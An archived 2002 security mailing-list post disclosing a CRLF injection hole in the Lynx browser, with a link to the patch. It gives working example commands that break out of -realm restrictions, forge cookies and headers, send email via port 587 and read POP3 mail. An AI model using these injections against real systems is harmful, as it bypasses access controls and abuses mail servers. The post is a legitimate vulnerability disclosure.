Lynx CRLF Injection, part two

From: Ulf Harnhammar (ulfhat_private)
Date: Thu Aug 22 2002 - 10:32:59 PDT

Next message: Steffen Dettmer: "Re: @(#)Mordred Labs advisory 0x0003: Buffer overflow in PostgreSQL"

Previous message: Jun-ichiro itojun Hagino: "IPv4 mapped address considered harmful"
Next in thread: Alberto Devesa: "Re: Lynx CRLF Injection, part two"
Reply: Alberto Devesa: "Re: Lynx CRLF Injection, part two"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Lynx CRLF Injection, part two


This is a follow-up to my "Lynx CRLF Injection" post a few days
ago.


* Lynx has got a realm feature that restricts users from accessing
any host apart from the host of its start page. That is, if you
start Lynx with "lynx -realm http://www.site1.st/", you are not
allowed to go to http://www.site2.st/ .

The CRLF Injection security hole allows users to break out of
realms - the command:

$ lynx -realm "http://www.site1.st/ HTTP/1.0
Host: www.site2.st

"

will show site2.st, despite the fact that it is outside of the realm.


* It allows users to send arbitrary cookies, user agents and
referers to a web server - even if you're using a restrictions option
saying that you're not allowed to change user agent:

$ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0
User-Agent: Ulf 0.0
Referer: http://www.metaur.nu/
Cookie: user=ulf

"


* It is also possible to use this hole for communication with other
types of servers than HTTP servers. You can send e-mails with it, for
example - even if you're using a restrictions option saying that
you're not allowed to send e-mails:

$ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0
HELO my.own.site
MAIL FROM: <my.ownat_private>
RCPT TO: <infoat_private>
DATA
From: my.ownat_private
To: infoat_private
Subject: This is..

This is a URL that sends an e-mail (?).
.
QUIT

"

You have to use port 587, as Lynx blocks port 25.

The MTA will complain about the "GET / HTTP/1.0" string, but it
still works.


* You can even use this hole for reading e-mails from a POP3 server:

$ lynx "http://mail.site1.st:110/ HTTP/1.0
USER ulf
PASS xxxx
LIST
RETR 1
QUIT

"

The POP3 server will also complain about the "GET / HTTP/1.0"
string, but it still works with this technology as well.


* As previously noted, the holes listed above mostly affects programs
that start Lynx, interactively or not, with a URL wholly or partially
under the user's control.


* The patch for this hole has moved to:
   ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch


// Ulf Harnhammar
ulfhat_private

Next message: Steffen Dettmer: "Re: @(#)Mordred Labs advisory 0x0003: Buffer overflow in PostgreSQL"
Previous message: Jun-ichiro itojun Hagino: "IPv4 mapped address considered harmful"
Next in thread: Alberto Devesa: "Re: Lynx CRLF Injection, part two"
Reply: Alberto Devesa: "Re: Lynx CRLF Injection, part two"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Aug 22 2002 - 10:42:19 PDT